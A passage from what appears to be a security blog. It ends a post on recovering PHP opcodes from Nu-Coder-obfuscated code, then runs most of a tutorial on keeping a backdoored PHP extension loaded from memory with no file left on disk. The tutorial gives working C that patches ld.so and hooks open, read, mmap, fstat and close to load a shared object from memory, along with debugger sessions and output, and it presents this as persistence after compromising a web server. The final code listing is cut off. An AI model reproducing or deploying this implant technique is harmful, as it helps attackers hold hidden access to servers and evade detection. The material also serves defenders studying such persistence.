pwndbg> print op_array->opcodes[1]->op2
$6 = {
  op_type = 1,
  u = {
    constant = {
      value = {
        lval = 93825000694432,
        dval = 4.6355709564149952e-310,
        str = {
          val = 0x555555d662a0 "DOCUMENT_ROOT",
          len = 13
        },
        ht = 0x555555d662a0,
        obj = {
          handle = 1440113312,
          handlers = 0xd
        }
      },
      refcount__gc = 2,
      type = 6 '\006',
      is_ref__gc = 1 '\001'
    },
    var = 1440113312,
    opline_num = 1440113312,
    op_array = 0x555555d662a0,
    jmp_addr = 0x555555d662a0,
    EA = {
      var = 1440113312,
      type = 21845
    }
  }
}
pwndbg> print op_array->opcodes[2]->handler
$8 = (opcode_handler_t) 0x55555582e650 <ZEND_CONCAT_SPEC_VAR_CONST_HANDLER>
pwndbg> print op_array->opcodes[2]->op2
$7 = {
  op_type = 1,
  u = {
    constant = {
      value = {
        lval = 93825000694464,
        dval = 4.6355709564165762e-310,
        str = {
          val = 0x555555d662c0 "/include/func.php",
          len = 17
        },
        ht = 0x555555d662c0,
        obj = {
          handle = 1440113344,
          handlers = 0x11
        }
      },
      refcount__gc = 2,
      type = 6 '\006',
      is_ref__gc = 1 '\001'
    },
    var = 1440113344,
    opline_num = 1440113344,
    op_array = 0x555555d662c0,
    jmp_addr = 0x555555d662c0,
    EA = {
      var = 1440113344,
      type = 21845
    }
  }
}
pwndbg> print op_array->opcodes[3]->handler
$9 = (opcode_handler_t) 0x5555558200f0 <ZEND_INCLUDE_OR_EVAL_SPEC_TMP_HANDLER>

Jackpot!

It is doing a concatenation between two constants and then an include/require! something like require($_SERVER['DOCUMENT_ROOT' . '/include/func.php'), and that is exactly what the first line of our code does!!!!!.

Once I confirmed that I could recover the opcodes directly I tried to compile the classic tools I used in CTFs: VLD, phpdebug, opdumper, etc. I wasted hours of my time trying to compile them in my environment and for PHP 5.3. I gave up that day: I didn’t want to build a parser. Luckily the next day I found this project called pecl-php-parserkit and it was everything I was needing: an opcode parser for PHP 5. And easy to mod!

So I added this function to parserkit:

static void xc3ll_hook(zend_op_array *ops){
    zend_op *op;
	int i;
	long flags = PHP_PARSEKIT_EXTENDED_VALUE;
    zval *return_value;
    MAKE_STD_ZVAL(return_value);
	array_init(return_value);

	for (op = ops->opcodes, i = 0; op && i < ops->size; op++, i++) {
		char *opline, *result, *op1, *op2;
		int opline_len, freeit = 0;

		if (php_parsekit_parse_node_simple(&result, ops, &(op->result), ops TSRMLS_CC)) {
			freeit |= 1;
		}
		if (php_parsekit_parse_node_simple(&op1, ops, &(op->op1), ops TSRMLS_CC)) {
			freeit |= 2;
		}
		if (php_parsekit_parse_node_simple(&op2, ops, &(op->op2), ops TSRMLS_CC)) {
			freeit |= 4;
		}

		opline_len = spprintf(&opline, 0, "%s %s %s %s",
			php_parsekit_define_name_ex(op->opcode, php_parsekit_opcode_names, &flags, PHP_PARSEKIT_OPCODE_UNKNOWN),
			result, op1, op2);
        FILE *fp = fopen("log.txt", "a");
        fprintf(fp, "%s\n", opline);
        fclose(fp);
		if (freeit & 1) efree(result);
		if (freeit & 2) efree(op1);
		if (freeit & 4) efree(op2);

		add_next_index_stringl(return_value, opline, opline_len, 0);
	}
    //php_var_dump(&return_value, 1);
}

It receives a pointer to a zend_op_array and parse the opcodes, saving the β€œmeaning” in a file called log.txt. Nothing fancy, but it did the work. Now I only need to load it and call this function with the pointer that zend_execute would use:

pwndbg> b *zend_execute
Breakpoint 2 at 0x555555815bb0: file /home/vagrant/research/nucoder/php-5.3.1/Zend/zend_vm_execute.h, line 40.
pwndbg> c
Continuing.

Breakpoint 2, execute (op_array=0x555555d66098) at /home/vagrant/research/nucoder/php-5.3.1/Zend/zend_vm_execute.h:40
pwndbg> print (void) xc3ll_hook(op_array)
$12 = void
pwndbg> !
➜  pecl-php-parsekit git:(master) βœ— head log.txt
ZEND_FETCH_R T(0) '_SERVER' UNUSED
ZEND_FETCH_DIM_R T(1) T(0) 'DOCUMENT_ROOT'
ZEND_CONCAT T(2) T(1) '/include/func.php...'
ZEND_INCLUDE_OR_EVAL T(3) T(2) 0x8
ZEND_FETCH_R T(4) '_SERVER' UNUSED
ZEND_FETCH_DIM_R T(5) T(4) 'DOCUMENT_ROOT'
ZEND_CONCAT T(6) T(5) '/include/init.php...'
ZEND_INCLUDE_OR_EVAL T(7) T(6) 0x8
ZEND_FETCH_R T(8) '_SERVER' UNUSED
ZEND_FETCH_DIM_R T(9) T(8) 'DOCUMENT_ROOT'

Nu-Coder is defeated! Now we have the original code (well, we need to parse the output to rebuild it, but is simple).

EoF

Of course this is only a shortened version of what happened this weekend.

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

Spice up your persistence: loading PHP extensions from memory

26 December 2022 at 00:00

Dear Fellowlship, today’s homily is about how to improve persistences based on PHP extensions. In this gospel we will explain a way to keep a PHP extension loaded on the server without it being backed up by a file on disk. Please, take a seat and listen the story.

Prayers at the foot of the Altar a.k.a. disclaimer

There are dozens different ways to achieve the same goal, some of them better and other worse. We are aware that the technique shown in this article can be improved making it more OPSEC friendly. This was just a simple PoC I had in mind since a few months ago and never had time to implement it, so I decided to use xmas time to write a PoC and publish about the idea. Kudos to @lockedbyte for spotting some bugs.

Introduction

Using backdoored plugins/addins/extensions as persistence method is one of my favorite techniques to keep a door open after compromising a web server (indeed I wrote about this topic in multiple times in last years: Backdoors in XAMPP stack (part I): PHP extensions, Backdoors in XAMP stack (part II): UDF in MySQL, Backdoors in XAMP stack (part III): Apache Modules and Improving PHP extensions as a persistence method.

Today’s article is a direct continuation of the PHP extensions saga, serving as the end of the trilogy. It is therefore MANDATORY to read the two previous articles (they are listed above) in order to understand this one. Please read them and then continue reading :)

As a quick recap from the last article, we were abusing two PHP β€œhooks” (MINIT & MSHUTDOWN) to execute code as root when the module would be loaded/unloaded. With MINIT code we saved the shared object in memory (just a copy) and deleted the .so from disk (also we modified the php.ini file to remove path), then with MSHUTDOWN (executed when the server is stoped or restarted) we wrote the .so from memory to disk and set again the extension path in php.ini, so the next time the server starts it would load again our code and the cycle continues.

The problem is that even if the file is removed from disk we can see it referenced in the mapped regions:

7fa44e763000-7fa44e765000 r--p 00000000 08:01 2816412                    /home/vagrant/research/php/backdoor/adepts/adepts.so
7fa44e765000-7fa44e767000 r-xp 00002000 08:01 2816412                    /home/vagrant/research/php/backdoor/adepts/adepts.so
7fa44e767000-7fa44e768000 r--p 00004000 08:01 2816412                    /home/vagrant/research/php/backdoor/adepts/adepts.so
7fa44e768000-7fa44e769000 r--p 00004000 08:01 2816412                    /home/vagrant/research/php/backdoor/adepts/adepts.so
7fa44e769000-7fa44e76a000 rw-p 00005000 08:01 2816412                    /home/vagrant/research/php/backdoor/adepts/adepts.so

So, how can we remove this? There are multiple ways to approach it, here we are going to force our extension to load a copy from memory and then unload itself.

Steps to follow
Steps to follow.

Trimming the fat

The first thing we need to understand is how PHP loads an extension and how the 4 hooks (MINIT/MSHUTDOWN and RINIT/RSHUTDOWN) are set. Let’s create a minimal extension:

php ../php-8.2.0/ext/ext_skel.php --ext adepts --dir .
cd adepts
phpize
./configure
make

Load it in a debugger and put a breakpoint at dlopen():

=> gdb php
pwndbg> b *dlopen
Breakpoint 1 at 0x203640
pwndbg> r -d "extension=/home/vagrant/research/php/backdoor/adepts/adepts.so"
Starting program: /usr/local/bin/php -d "extension=/home/vagrant/research/php/backdoor/adepts/adepts.so"
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, ___dlopen (file=0x7ffff5805038 "/home/vagrant/research/php/backdoor/adepts/adepts.so", mode=265) at ./dlfcn/dlopen.c:77

 =>f 0   0x7ffff7b49700 dlopen
   f 1   0x55555595d5d4 php_load_shlib+37
   f 2   0x55555595d7b1 php_load_extension+424
   f 3   0x555555a97969 php_load_php_extension_cb+41
   f 4   0x555555b3cb8e zend_llist_apply+50
   f 5   0x555555a98be1 php_ini_register_extensions+58
   f 6   0x555555a8d278 php_module_startup+2413
   f 7   0x555555e08ab5 php_cli_startup+33

We can observe that the function php_load_extension is the one that loads the extension. This function can be found at /ext/standard/dl.c, being the most interesting part:

zend_module_entry *module_entry;

zend_module_entry *(*get_module)(void);

//...

handle = php_load_shlib(libpath, &err2);
//...

get_module = (zend_module_entry *(*)(void)) DL_FETCH_SYMBOL(handle, "get_module");

//...

module_entry = get_module();
//...
if ((module_entry = zend_register_module_ex(module_entry)) == NULL) {

    DL_UNLOAD(handle);

    return FAILURE;

}

if ((type == MODULE_TEMPORARY || start_now) && zend_startup_module_ex(module_entry) == FAILURE) {

    DL_UNLOAD(handle);

    return FAILURE;

}

As we can see the code looks for the exported symbol get_module and executes it as a function that returns a pointer to a zend_module_entry structure. This structure is described as:

struct _zend_module_entry {

    unsigned short size;

    unsigned int zend_api;

    unsigned char zend_debug;

    unsigned char zts;

    const struct _zend_ini_entry *ini_entry;

    const struct _zend_module_dep *deps;

    const char *name;

    const struct _zend_function_entry *functions;

    zend_result (*module_startup_func)(INIT_FUNC_ARGS);

    zend_result (*module_shutdown_func)(SHUTDOWN_FUNC_ARGS);

    zend_result (*request_startup_func)(INIT_FUNC_ARGS);

    zend_result (*request_shutdown_func)(SHUTDOWN_FUNC_ARGS);

    void (*info_func)(ZEND_MODULE_INFO_FUNC_ARGS);

    const char *version;

    size_t globals_size;

    #ifdef ZTS

    ts_rsrc_id* globals_id_ptr;

    #else

    void* globals_ptr;

    #endif

    void (*globals_ctor)(void *global);

    void (*globals_dtor)(void *global);

    zend_result (*post_deactivate_func)(void);

    int module_started;

    unsigned char type;

    void *handle;

    int module_number;

    const char *build_id;

};

The most relevant part is

//...

    zend_result (*module_startup_func)(INIT_FUNC_ARGS);

    zend_result (*module_shutdown_func)(SHUTDOWN_FUNC_ARGS);

    zend_result (*request_startup_func)(INIT_FUNC_ARGS);

    zend_result (*request_shutdown_func)(SHUTDOWN_FUNC_ARGS);
//...

We do not need to use macros like PHP_MINIT_FUNCTION as only need to set these members with pointers to functions that returns a zend_result type. A minimum skeleton would be:

/* adepts extension for PHP */

#ifdef HAVE_CONFIG_H
# include "config.h"
#endif

#include "php.h"
#include "ext/standard/info.h"
#include "php_adepts.h"

/* For compatibility with older PHP versions */
#ifndef ZEND_PARSE_PARAMETERS_NONE
#define ZEND_PARSE_PARAMETERS_NONE() \
    ZEND_PARSE_PARAMETERS_START(0, 0) \
    ZEND_PARSE_PARAMETERS_END()
#endif


// Basic zend_module_entry
zend_module_entry adepts_module_entry = {
    STANDARD_MODULE_HEADER,
    "adepts",                   /* Extension name */
    NULL,                   /* zend_function_entry */
    NULL,                           /* PHP_MINIT - Module initialization */
    NULL,                           /* PHP_MSHUTDOWN - Module shutdown */
    NULL,           /* PHP_RINIT - Request initialization */
    NULL,                           /* PHP_RSHUTDOWN - Request shutdown */
    NULL,           /* PHP_MINFO - Module info */
    PHP_ADEPTS_VERSION,     /* Version */
    STANDARD_MODULE_PROPERTIES
};

//Function "get_module" that will be executed by PHP
extern zend_module_entry *get_module(void){
    printf("[*] This function was called from get_module when the extension was attempted to be load\n");
    return &adepts_module_entry;
}



#ifdef COMPILE_DL_ADEPTS
# ifdef ZTS
ZEND_TSRMLS_CACHE_DEFINE()
# endif
ZEND_GET_MODULE(adepts)
#endif

Let’s compile it:

gcc adepts.c -shared -fPIC -o adepts.so -I/usr/local/include/php -I/usr/local/include/php/main -I/usr/local/include/php/TSRM -I/usr/local/include/php/Zend -I/usr/local/include/php/ext -I/usr/local/include/php/ext/date/lib

And test:

=> php  -d "extension=/home/vagrant/research/php/backdoor/adepts/adepts.so" -r "echo 'hello\n';"
[*] This function was called from get_module when the extension was attempted to be load
hello\n% 

dlopen() from memory

There are different options to load our extension directly from memory and not from disk. In this case I am going to borrow code from memdlopen project to patch ld.so. First we need to add code to parse /proc/self/maps and locate ld.so:

/* adepts extension for PHP */

#ifdef HAVE_CONFIG_H
# include "config.h"
#endif

#include "php.h"
#include "ext/standard/info.h"
#include "php_adepts.h"

/* For compatibility with older PHP versions */
#ifndef ZEND_PARSE_PARAMETERS_NONE
#define ZEND_PARSE_PARAMETERS_NONE() \
    ZEND_PARSE_PARAMETERS_START(0, 0) \
    ZEND_PARSE_PARAMETERS_END()
#endif


size_t page_size;


bool find_ld_in_memory(uint64_t *addr1, uint64_t *addr2) {
    FILE* f = NULL;
    char  buffer[1024] = {0};
    char* tmp = NULL;
    char* start = NULL;
    char* end = NULL;
    bool  found = false;

    if ((f = fopen("/proc/self/maps", "r")) == NULL){
        return found;
    }

    while ( fgets(buffer, sizeof(buffer), f) ){
        if ( strstr(buffer, "r-xp") == 0 ) {
            continue;
        }
        if ( strstr(buffer, "ld-linux-x86-64.so.2") == 0 ) {
            continue;        
        }

        buffer[strlen(buffer)-1] = 0;
        tmp = strrchr(buffer, ' ');
        if ( tmp == NULL || tmp[0] != ' ')
            continue;
        ++tmp;

        start = strtok(buffer, "-");
        *addr1 = strtoul(start, NULL, 16);
        end = strtok(NULL, " ");
        *addr2 = strtoul(end, NULL, 16);
        found = true;
    }
    fclose(f);
    return found;
}

void patch_all(void){
    uint64_t start = 0;
    uint64_t end = 0;
    size_t i = 0;
    
    page_size = sysconf(_SC_PAGESIZE);

    if (!find_ld_in_memory(&start, &end)){
        return;
    }
    printf("[*] ld.so found in range [0x%lx-0x%lx]\n", start, end);

    return;
}



// Basic zend_module_entry
zend_module_entry adepts_module_entry = {
    STANDARD_MODULE_HEADER,
    "adepts",                   /* Extension name */
    NULL,                   /* zend_function_entry */
    NULL,                           /* PHP_MINIT - Module initialization */
    NULL,                           /* PHP_MSHUTDOWN - Module shutdown */
    NULL,           /* PHP_RINIT - Request initialization */
    NULL,                           /* PHP_RSHUTDOWN - Request shutdown */
    NULL,           /* PHP_MINFO - Module info */
    PHP_ADEPTS_VERSION,     /* Version */
    STANDARD_MODULE_PROPERTIES
};

//Function "get_module" that will be executed by PHP
extern zend_module_entry *get_module(void){
    patch_all();
    return &adepts_module_entry;
}



#ifdef COMPILE_DL_ADEPTS
# ifdef ZTS
ZEND_TSRMLS_CACHE_DEFINE()
# endif
ZEND_GET_MODULE(adepts)
#endif

My lab uses more recent versions of glibc…

=> lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.1 LTS
Release:    22.04
Codename:   jammy

=> ldd --version 
ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35

…so we have to update the signatures to find where the hooks have to be inserted. Let’s create an extension that hooks ld.so and traces the execution:

/* adepts extension for PHP */

#ifdef HAVE_CONFIG_H
# include "config.h"
#endif

#include "php.h"
#include "ext/standard/info.h"
#include "php_adepts.h"

 #include <sys/mman.h>

/* For compatibility with older PHP versions */
#ifndef ZEND_PARSE_PARAMETERS_NONE
#define ZEND_PARSE_PARAMETERS_NONE() \
    ZEND_PARSE_PARAMETERS_START(0, 0) \
    ZEND_PARSE_PARAMETERS_END()
#endif




typedef struct {
    void * data;
    int size;
    int current;
} lib_t;

lib_t libdata;


char stub[] = {0x55, 0x48, 0x89, 0xe5, 0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xd0, 0xc9, 0xc3};
size_t stub_length = 18;

#define LIBC "/lib/x86_64-linux-gnu/libc.so.6"


int     my_open(const char *pathname, int flags); 
off_t   my_pread64(int fd, void *buf, size_t count, off_t offset);
ssize_t my_read(int fd, void *buf, size_t count);
void *  my_mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
int     my_fstat(int fd, struct stat *buf);
int     my_close(int fd);


/*
pwndbg> disassemble 0x7ffff7fc99ad,+20
Dump of assembler code from 0x7ffff7fc99ad to 0x7ffff7fc99c1:
   0x00007ffff7fc99ad <open_verify+109>:    sub    rdx,rax
   0x00007ffff7fc99b0 <open_verify+112>:    lea    rsi,[rdi+rax*1]
   0x00007ffff7fc99b4 <open_verify+116>:    mov    edi,r15d
   0x00007ffff7fc99b7 <open_verify+119>:    call   0x7ffff7fe9b80 <__GI___read_nocancel>

*/
const char read_pattern[] = {0x48, 0x29, 0xc2, 0x48,  0x8d, 0x34,  0x07, 0x44, 0x89, 0xff, 0xe8};
#define read_pattern_length 11

/*
pwndbg> disass 0x7ffff7fcc088,+40
Dump of assembler code from 0x7ffff7fcc088 to 0x7ffff7fcc0b0:
   0x00007ffff7fcc088 <_dl_map_object_from_fd+1208>:    mov    ecx,0x812
   0x00007ffff7fcc08d <_dl_map_object_from_fd+1213>:    mov    DWORD PTR [rbp-0xe0],r11d
   0x00007ffff7fcc094 <_dl_map_object_from_fd+1220>:    call   0x7ffff7fe9cc0 <__mmap64>
*/
const char mmap_pattern[] = {0xb9, 0x12, 0x08, 0x00, 0x00, 0x44, 0x89, 0x9d, 0x20, 0xff, 0xff, 0xff, 0xe8};
#define mmap_pattern_length 13

/*
pwndbg> disass 0x7ffff7fcc0c8,+20
Dump of assembler code from 0x7ffff7fcc0c8 to 0x7ffff7fcc0dc:
   0x00007ffff7fcc0c8 <_dl_map_object_from_fd+1272>:    mov    edi,DWORD PTR [rbp-0xd4]
   0x00007ffff7fcc0ce <_dl_map_object_from_fd+1278>:    lea    rsi,[rbp-0xc0]
   0x00007ffff7fcc0d5 <_dl_map_object_from_fd+1285>:    call   0x7ffff7fe98a0 <__GI___fstat64>
   */
const char fxstat_pattern[] = {0x8b, 0xbd, 0x2c, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xb5, 0x40, 0xff, 0xff, 0xff, 0xe8};
#define fxstat_pattern_length 14

/*
pwndbg> disass 0x7ffff7fcc145,+40
Dump of assembler code from 0x7ffff7fcc145 to 0x7ffff7fcc16d:
   0x00007ffff7fcc145 <_dl_map_object_from_fd+1397>:    mov    edi,DWORD PTR [rbp-0xd4]
   0x00007ffff7fcc14b <_dl_map_object_from_fd+1403>:    call   0x7ffff7fe99f0 <__GI___close_nocancel>
*/
const char close_pattern[] = {0x8b, 0xbd, 0x2c, 0xff, 0xff, 0xff, 0xe8};
#define close_pattern_length 7

/*
pwndbg> disass 0x7ffff7fc996a,+40
Dump of assembler code from 0x7ffff7fc996a to 0x7ffff7fc9992:
   0x00007ffff7fc996a <open_verify+42>: mov    esi,0x80000
   0x00007ffff7fc996f <open_verify+47>: mov    rdi,r14
   0x00007ffff7fc9972 <open_verify+50>: xor    eax,eax
   0x00007ffff7fc9974 <open_verify+52>: call   0x7ffff7fe9b00 <__GI___open64_nocancel>
*/
const char open_pattern[] = {0xbe, 0x00, 0x00, 0x08, 0x00, 0x4c, 0x89, 0xf7, 0x31, 0xc0, 0xe8};
#define open_pattern_length 11

/*
pwndbg> disass 0x00007ffff7fcc275,+40
Dump of assembler code from 0x7ffff7fcc275 to 0x7ffff7fcc29d:
   0x00007ffff7fcc275 <_dl_map_object_from_fd+1701>:    mov    rsi,rax
   0x00007ffff7fcc278 <_dl_map_object_from_fd+1704>:    mov    QWORD PTR [rbp-0x158],rax
   0x00007ffff7fcc27f <_dl_map_object_from_fd+1711>:    call   0x7ffff7fe9bb0 <__GI___pread64_nocancel>
*/
const char pread64_pattern[] = {0x48, 0x89, 0xc6, 0x48, 0x89, 0x85, 0xa8, 0xfe, 0xff, 0xff, 0xe8};
#define pread64_pattern_length 11

const char* patterns[] = {read_pattern, mmap_pattern, pread64_pattern, fxstat_pattern, close_pattern,
                          open_pattern, NULL};
const size_t pattern_lengths[] = {read_pattern_length, mmap_pattern_length, pread64_pattern_length, 
                                  fxstat_pattern_length, close_pattern_length, open_pattern_length, 0};
const char* symbols[] = {"read", "mmap", "pread", "fstat", "close", "open", NULL};
uint64_t functions[] = {(uint64_t)&my_read, (uint64_t)&my_mmap, (uint64_t)&my_pread64, (uint64_t)&my_fstat, 
                        (uint64_t)&my_close, (uint64_t)&my_open, 0}; 
char *fixes[7] = {0};

uint64_t fix_locations[7] = {0};
size_t page_size;


bool find_ld_in_memory(uint64_t *addr1, uint64_t *addr2) {
    FILE* f = NULL;
    char  buffer[1024] = {0};
    char* tmp = NULL;
    char* start = NULL;
    char* end = NULL;
    bool  found = false;

    if ((f = fopen("/proc/self/maps", "r")) == NULL){
        return found;
    }

    while ( fgets(buffer, sizeof(buffer), f) ){
        if ( strstr(buffer, "r-xp") == 0 ) {
            continue;
        }
        if ( strstr(buffer, "ld-linux-x86-64.so.2") == 0 ) {
            continue;        
        }

        buffer[strlen(buffer)-1] = 0;
        tmp = strrchr(buffer, ' ');
        if ( tmp == NULL || tmp[0] != ' ')
            continue;
        ++tmp;

        start = strtok(buffer, "-");
        *addr1 = strtoul(start, NULL, 16);
        end = strtok(NULL, " ");
        *addr2 = strtoul(end, NULL, 16);
        found = true;
    }
    fclose(f);
    return found;
}


/* hooks */

int my_open(const char *pathname, int flags) {
    void *handle;
    int (*mylegacyopen)(const char *pathnam, int flags);

    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyopen = dlsym(handle, "open");
    printf("\t[+] Inside hooked open (ARG: %s)\n", pathname);
    return mylegacyopen(pathname, flags);
}

ssize_t my_read(int fd, void *buf, size_t count){
    void *handle;
    ssize_t (*mylegacyread)(int fd, void *buf, size_t count);

    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyread = dlsym(handle, "read");
    printf("\t[+] Inside hooked read (FD: %d)\n", fd);
    return mylegacyread(fd, buf, count);
}

void * my_mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset){
    int mflags = 0;
    void * ret = NULL;
    uint64_t start = 0;
    
    printf("\t[+] Inside hooked mmap\n");
    return mmap(addr, length, prot, flags, fd, offset);
}


int my_fstat(int fd, struct stat *buf){
    void *handle;
    int (*mylegacyfstat)(int fd, struct stat *buf);


    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyfstat = dlsym(handle, "fstat64");

    printf("\t[+] Inside hooked fstat (FD: %d)\n", fd);
    return mylegacyfstat(fd, buf);
}

int my_close(int fd) {
    printf("\t[+] Inside Hooked close (FD: %d)\n", fd);
    return close(fd);
}

ssize_t my_pread64(int fd, void *buf, size_t count, off_t offset) {
    void *handle;
    int (*mylegacypread)(int fd, void *buf, size_t count);

    handle = dlopen(LIBC, RTLD_NOW);
    mylegacypread = dlsym(handle, "pread");
    printf("\t[+] Inside pread64 (FD: %d)\n", fd);
    return mylegacypread(fd, buf, count);
}


/* Patch ld.so */
bool search_and_patch(uint64_t start_addr, uint64_t end_addr, const char* pattern, const size_t length, const char* symbol, const uint64_t replacement_addr, int position) {

    bool     found = false;
    int32_t  offset = 0;
    uint64_t tmp_addr = 0;
    uint64_t symbol_addr = 0;
    char * code = NULL;
    void * page_addr = NULL;

    tmp_addr = start_addr;
    while ( ! found && tmp_addr+length < end_addr) {
        if ( memcmp((void*)tmp_addr, (void*)pattern, length) == 0 ) {
            found = true;
            continue;
        }
        ++tmp_addr;
    }

    if ( ! found ) {
        return false;
    }

    offset = *((uint64_t*)(tmp_addr + length));
    symbol_addr = tmp_addr + length + 4 + offset;

    //Save data to fix later
    fixes[position] = malloc(stub_length * sizeof(char));
    memcpy(fixes[position], (void*)symbol_addr, stub_length);
    fix_locations[position] = symbol_addr;
    printf("[*] Symbol: %s - Addr: %lx\n", symbol, fix_locations[position]);

    code = malloc(stub_length * sizeof(char));
    memcpy(code, stub, stub_length);
    memcpy(code+6, &replacement_addr, sizeof(uint64_t));

    page_addr = (void*) (((size_t)symbol_addr) & (((size_t)-1) ^ (page_size - 1)));
    mprotect(page_addr, page_size, PROT_READ | PROT_WRITE); 
    memcpy((void*)symbol_addr, code, stub_length);
    mprotect(page_addr, page_size, PROT_READ | PROT_EXEC); 
    return true;
}

/* Read file from disk */
bool load_library_from_file(char * path, lib_t *libdata) {
    struct stat st;
    FILE * file;
    size_t read;

    if ( stat(path, &st) < 0 ) {
        return false;
    }

    libdata->size = st.st_size;
    libdata->data = malloc( st.st_size );
    libdata->current = 0;

    file = fopen(path, "r");

    read = fread(libdata->data, 1, st.st_size, file);
    fclose(file);

    return true;
}


void patch_all(void){
    uint64_t start = 0;
    uint64_t end = 0;
    size_t i = 0;
    
    page_size = sysconf(_SC_PAGESIZE);
    printf("\t\t-=[ Proof of Concept ]=-\n\n");

   /* if (!load_library_from_file("/home/vagrant/research/php/backdoor/adepts/adepts.so", &libdata)){
        return;
    }*/
    if (!find_ld_in_memory(&start, &end)){
        return;
    }
    printf("[*] ld.so found in range [0x%lx-0x%lx]\n", start, end);
    printf("-------------[ Patching  ]-------------\n");
    while ( patterns[i] != NULL ) {
        if ( ! search_and_patch(start, end, patterns[i], pattern_lengths[i], symbols[i], functions[i], i) ) {     
            return;
        } 
        ++i;
    }
    printf("---------------------------------------\n");
    return;
}



// Basic zend_module_entry
zend_module_entry adepts_module_entry = {
    STANDARD_MODULE_HEADER,
    "adepts",                   /* Extension name */
    NULL,                   /* zend_function_entry */
    NULL,                           /* PHP_MINIT - Module initialization */
    NULL,                           /* PHP_MSHUTDOWN - Module shutdown */
    NULL,           /* PHP_RINIT - Request initialization */
    NULL,                           /* PHP_RSHUTDOWN - Request shutdown */
    NULL,           /* PHP_MINFO - Module info */
    PHP_ADEPTS_VERSION,     /* Version */
    STANDARD_MODULE_PROPERTIES
};

//Function "get_module" that will be executed by PHP
extern zend_module_entry *get_module(void){
    patch_all();
    void *handler = dlopen("/home/vagrant/research/php/backdoor/adepts/test.so", RTLD_NOW); 
    return &adepts_module_entry;
}



#ifdef COMPILE_DL_ADEPTS
# ifdef ZTS
ZEND_TSRMLS_CACHE_DEFINE()
# endif
ZEND_GET_MODULE(adepts)
#endif

My test.so is just a shared object that prints a message when loaded:

=> php  -d "extension=/home/vagrant/research/php/backdoor/adepts/adepts.so" -r "echo 1;" 
        -=[ Proof of Concept ]=-

[*] ld.so found in range [0x7f5dd6999000-0x7f5dd69c3000]
-------------[ Patching  ]-------------
[*] Symbol: read - Addr: 7f5dd69bdb80
[*] Symbol: mmap - Addr: 7f5dd69bdcc0
[*] Symbol: pread - Addr: 7f5dd69bdbb0
[*] Symbol: fstat - Addr: 7f5dd69bd8a0
[*] Symbol: close - Addr: 7f5dd69bd9f0
[*] Symbol: open - Addr: 7f5dd69bdb00
---------------------------------------
    [+] Inside hooked open (ARG: /home/vagrant/research/php/backdoor/adepts/test.so)
    [+] Inside hooked read (FD: 3)
    [+] Inside hooked fstat (FD: 3)
    [+] Inside hooked mmap
    [+] Inside hooked mmap
    [+] Inside hooked mmap
    [+] Inside hooked mmap
    [+] Inside Hooked close (FD: 3)
Lib initialized successfully!
1% 

Now that we checked our hooks were successfully deployed it’s time to add the real functionalities to them. First we have to do is detect, at open(), if the path provided matches a magic word (in this case we use β€œmagic.so”), if so we have to return a magic value as file descriptor (0x69).

int my_open(const char *pathname, int flags) {
    void *handle;
    int (*mylegacyopen)(const char *pathnam, int flags);

    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyopen = dlsym(handle, "open");
    if (strstr(pathname, "magic.so") != 0){
        printf("\t[+] Open called with magic word. Returning magic FD (0x69)\n");
        return 0x69;
    }
    return mylegacyopen(pathname, flags);
}

Next we have to modify read() to return the extension contents from memory (we readed the file before).

ssize_t my_read(int fd, void *buf, size_t count){
    void *handle;
    ssize_t (*mylegacyread)(int fd, void *buf, size_t count);

    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyread = dlsym(handle, "read");
    if (fd == 0x69){
        size_t size = 0;
        if ( libdata.size - libdata.current >= count ) {
            size = count;
        } else {
            size = libdata.size - libdata.current;
        }
        memcpy(buf, libdata.data+libdata.current, size);
        libdata.current += size;
        printf("\t[+] Read called with magic FD. Returning %ld bytes from memory\n", size);
        return size;
    }
    return mylegacyread(fd, buf, count);
}

Also we have to modify fstat64() so it returns a congruent value:

int my_fstat(int fd, struct stat *buf){
    void *handle;
    int (*mylegacyfstat)(int fd, struct stat *buf);


    handle = dlopen (LIBC, RTLD_NOW);
    mylegacyfstat = dlsym(handle, "fstat64");

    if ( fd == 0x69 ) {
        memset(buf, 0, sizeof(struct stat));
        buf->st_size = libdata.size;
        buf->st_ino = 0x666; // random number
        printf("\t[+] Inside hooked fstat64 (fd: 0x%x)\n", fd);
        return 0;
    }
    return mylegacyfstat(fd, buf);
}

Then we have to map the file contents in anonymous sections and modify the memory perms:

void * my_mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset){
    int mflags = 0;
    void * ret = NULL;
    uint64_t start = 0;
    size_t size = 0;

    if ( fd == 0x69 ) {
        mflags = MAP_PRIVATE|MAP_ANON;
        if ( (flags & MAP_FIXED) != 0 ) {
            mflags |= MAP_FIXED;
        }
        ret = mmap(addr, length, PROT_READ|PROT_WRITE|PROT_EXEC, mflags, -1, 0);
        size = length > libdata.size - offset ? libdata.size - offset : length;
        memcpy(ret, libdata.data + offset, size);
        mprotect(ret, size, prot);
        if (first == 0){
            first = (uint64_t)ret;
        }
        printf("\t[+] Inside hooked mmap (fd: 0x%x)\n", fd);
        return ret;
    }
    return mmap(addr, length, prot, flags, fd, offset);
}

And lastly we edit close() hook to return β€œ0” as we never opened the file descriptor.

int my_close(int fd) {
    if (fd == 0x69){
        printf("\t[+] Inside hooked close (fd: 0x%x)\n", fd);
        return 0;
    }
    return close(fd);
}

So the final code is:

/* adepts extension for PHP */

#ifdef HAVE_CONFIG_H
# include "config.h"
#endif

#include "php.h"
#include "ext/standard/info.h"
#include "php_adepts.h"

 #include <sys/mman.h>

/* For compatibility with older PHP versions */
#ifndef ZEND_PARSE_PARAMETERS_NONE
#define ZEND_PARSE_PARAMETERS_NONE() \
    ZEND_PARSE_PARAMETERS_START(0, 0) \
    ZEND_PARSE_PARAMETERS_END()
#endif




typedef struct {
    void * data;
    size_t size;
    size_t current;
} lib_t;

lib_t libdata;


